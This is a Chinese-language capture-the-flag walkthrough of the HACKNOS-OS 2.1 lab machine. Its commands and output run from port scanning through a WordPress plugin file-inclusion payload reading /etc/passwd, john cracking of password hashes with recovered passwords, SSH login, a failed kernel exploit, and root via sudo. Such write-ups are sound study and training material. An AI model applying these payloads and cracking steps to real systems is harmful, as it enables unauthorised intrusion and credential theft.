标签:sbin tsweb 22 HACKNOS nologin flag usr 2.1 OS
OS-HACKNOS-2.1
目录1 信息收集
1.1 端口扫描
$ nmap -A -p - -T4 192.168.56.103 -oA OS-HACKNOS-2.1
Nmap scan report for 192.168.56.103
Host is up (0.00042s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:36:4e:71:6a:83:e2:c1:1e:a9:52:64:45:f6:29:80 (RSA)
| 256 b4:ce:5a:c3:3f:40:52:a6:ef:dc:d8:29:f3:2c:b5:d1 (ECDSA)
|_ 256 09:6c:17:a1:a3:b4:c7:78:b9:ad:ec:de:8f:64:b1:7b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1.2 后台目录扫描
$ dirsearch -x403 -u http://192.168.56.103/
Target: http://192.168.56.103/
[22:21:48] Starting:
[22:22:16] 200 - 11KB - /index.html
[22:22:34] 301 - 316B - /tsweb -> http://192.168.56.103/tsweb/
[22:22:35] 200 - 43KB - /tsweb/
Task Completed
# /tsweb/目录扫描
$ dirsearch -u http://192.168.56.103/tsweb/
Target: http://192.168.56.103/tsweb/
[22:35:36] Starting:
[22:35:51] 301 - 0B - /tsweb/index.php -> http://192.168.56.103/tsweb/
[22:35:52] 200 - 19KB - /tsweb/license.txt
[22:35:57] 200 - 7KB - /tsweb/readme.html
[22:36:03] 301 - 325B - /tsweb/wp-admin -> http://192.168.56.103/tsweb/wp-admin/
[22:36:03] 400 - 1B - /tsweb/wp-admin/admin-ajax.php
[22:36:03] 302 - 0B - /tsweb/wp-admin/ -> http://192.168.56.103/tsweb/wp-login.php?redirect_to=http%3A%2F%2F192.168.56.103%2Ftsweb%2Fwp-admin%2F&reauth=1
[22:36:03] 500 - 3KB - /tsweb/wp-admin/setup-config.php
[22:36:03] 301 - 327B - /tsweb/wp-content -> http://192.168.56.103/tsweb/wp-content/
[22:36:03] 200 - 0B - /tsweb/wp-config.php
[22:36:03] 200 - 1KB - /tsweb/wp-admin/install.php
[22:36:03] 200 - 0B - /tsweb/wp-content/
[22:36:03] 200 - 69B - /tsweb/wp-content/plugins/akismet/akismet.php
[22:36:03] 500 - 0B - /tsweb/wp-content/plugins/hello.php
[22:36:03] 200 - 1KB - /tsweb/wp-content/uploads/
[22:36:03] 200 - 796B - /tsweb/wp-content/upgrade/
[22:36:03] 301 - 328B - /tsweb/wp-includes -> http://192.168.56.103/tsweb/wp-includes/
[22:36:03] 200 - 0B - /tsweb/wp-cron.php
[22:36:03] 500 - 0B - /tsweb/wp-includes/rss-functions.php
[22:36:03] 302 - 0B - /tsweb/wp-signup.php -> http://192.168.56.103/tsweb/wp-login.php?action=register
[22:36:03] 200 - 6KB - /tsweb/wp-login.php
[22:36:03] 200 - 45KB - /tsweb/wp-includes/
[22:36:04] 405 - 42B - /tsweb/xmlrpc.php
Task Completed
1.2.1 目录分析
-
http://192.168.56.103/tsweb/
1.2.2 WPScan扫描
$ wpscan --url http://192.168.56.103/tsweb/ -e vp --api-token Yourapi
| [!] 1 vulnerability identified:
|
| [!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
| References:
| - https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
| - https://www.exploit-db.com/exploits/46537/
| - https://seclists.org/fulldisclosure/2019/Mar/26
- 根据扫描结果发现目标系统使用的WP插件存在本地文件包含漏洞
2 WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion利用
-
Local File Inclusion POC: GET /wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd -
访问
http://192.168.56.103/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd验证漏洞得到flag:root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
2.1 爆破flag用户的密码
$ cat passwd
$1$flag$vqjCxzjtRc7PofLYS2lWf/
$ john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt passwd
topsecret (?)
2.2 GetShell
# 使用flag:topsecret成功登录系统
$ ssh flag@192.168.56.103
flag@hacknos:/$
2.3 切换Python Shell
python3 -c "import pty;pty.spawn('/bin/bash')"
2.4 检测系统是否存在提权漏洞
flag@hacknos:/tmp/linux-exploit-suggester-1.1$ ./linux-exploit-suggester.sh
Possible Exploits:
cat: write error: Broken pipe
[+] [CVE-2018-18955] subuid_shell
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
Exposure: probable
Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
Comments: CONFIG_USER_NS needs to be enabled
3 提权
3.1 尝试利用CVE-2018-18955提权
-
下载exp:https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
-
kali编译exp:
$ gcc subshell.c -o subshell $ gcc subuid_shell.c -o subuid_shell -
上传exp到目标系统
flag@hacknos:/tmp$ scp kali@192.168.56.102:/home/kali/45886/subshell . flag@hacknos:/tmp$ scp kali@192.168.56.102:/home/kali/45886/subuid_shell . -
尝试利用exp失败
flag@hacknos:/tmp$ cat /etc/shadow cat: /etc/shadow: Permission denied flag@hacknos:/tmp$ ./subuid_shell newuidmap: uid range [0-1000) -> [100000-101000) not allowed subuid_shell: newuidmap failed flag@hacknos:/tmp$ ./subshell subshell: write uid map: Operation not permitted subshell: read from sock: Success flag@hacknos:/tmp$ id uid=1001(flag) gid=1003(flag) groups=1003(flag)
3.2 收集当前系统信息
-
查看当前系统中的可疑文件
flag@hacknos:/var/backups$ ls apt.extended_states.0 apt.extended_states.1.gz passbkp flag@hacknos:/var/backups$ cat passbkp/md5-hash $1$rohit$01Dl0NQKtgfeL08fGrggi0 -
查看flag用户所创建的文件:没有东东
flag@hacknos:/$ find / -user flag 2>/dev/null | egrep -v "/proc" -
查看系统所设置的cap权限
flag@hacknos:/$ getcap -r / 2>/dev/null /usr/bin/mtr-packet = cap_net_raw+ep -
查看当前系统中具有sid权限的命令:没有东东
flag@hacknos:/$ find / -perm -u=s 2>/dev/null
3.3 切换用户
-
爆破flag用户的密码
$ cat passwd $1$rohit$01Dl0NQKtgfeL08fGrggi0 $ john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt passwd !%hack41 (?) -
切换成功
flag@hacknos:/var/www/html/tsweb$ su - rohit Password: rohit@hacknos:~$ -
查看rohit用户的权限
rohit@hacknos:~$ id uid=1000(rohit) gid=1000(rohit) groups=1000(rohit),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd) -
查看rohit用户的sudo权限
rohit@hacknos:~$ sudo -l [sudo] password for rohit: Matching Defaults entries for rohit on hacknos: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User rohit may run the following commands on hacknos: (ALL : ALL) ALL
3.4 提权
rohit@hacknos:~$ sudo -i
root@hacknos:~# cat root.txt
_______ __ __ __ #
/ \ / | / |/ | #
$$$$$$$ | ______ ______ _$$ |_ _$$ |$$ |_ #
$$ |__$$ | / \ / \ / $$ | / $$ $$ | #
$$ $$< /$$$$$$ |/$$$$$$ |$$$$$$/ $$$$$$$$$$/ #
$$$$$$$ |$$ | $$ |$$ | $$ | $$ | __ / $$ $$ | #
$$ | $$ |$$ \__$$ |$$ \__$$ | $$ |/ | $$$$$$$$$$/ #
$$ | $$ |$$ $$/ $$ $$/ $$ $$/ $$ |$$ | #
$$/ $$/ $$$$$$/ $$$$$$/ $$$$/ $$/ $$/ #
#############################################################
#############################################################
MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b
Blog : www.hackNos.com
Author : Rahul Gehlaut
linkedin : https://www.linkedin.com/in/rahulgehlaut/
#############################################################
root@hacknos:~#
标签:sbin,tsweb,22,HACKNOS,nologin,flag,usr,2.1,OS 来源: https://www.cnblogs.com/f-carey/p/16098182.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。